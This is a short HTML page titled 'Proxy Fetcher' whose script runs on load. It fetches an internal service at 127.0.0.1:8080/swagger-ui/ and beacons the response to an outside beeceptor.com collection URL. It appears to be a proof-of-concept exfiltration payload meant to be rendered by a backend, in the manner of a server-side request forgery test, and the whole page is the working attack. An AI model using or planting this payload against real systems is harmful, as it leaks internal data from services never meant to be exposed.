<!DOCTYPE html>
<html>
<head><title>Proxy Fetcher</title></head>
<body>
<script>
async function sendDataOut() {
    try {
        const res = await fetch('http://127.0.0.1:8080/swagger-ui/');
        const textData = await res.text();

        // Send data OUTSIDE using beacon
        navigator.sendBeacon(
          'https://vodagh.free.beeceptor.com',
          textData
        );
    } catch(e) {
        console.log('Failed:', e);
    }
}

// Run with delay to make sure backend catches it
setTimeout(sendDataOut, 1000);
</script>
Done...
</body>
</html>

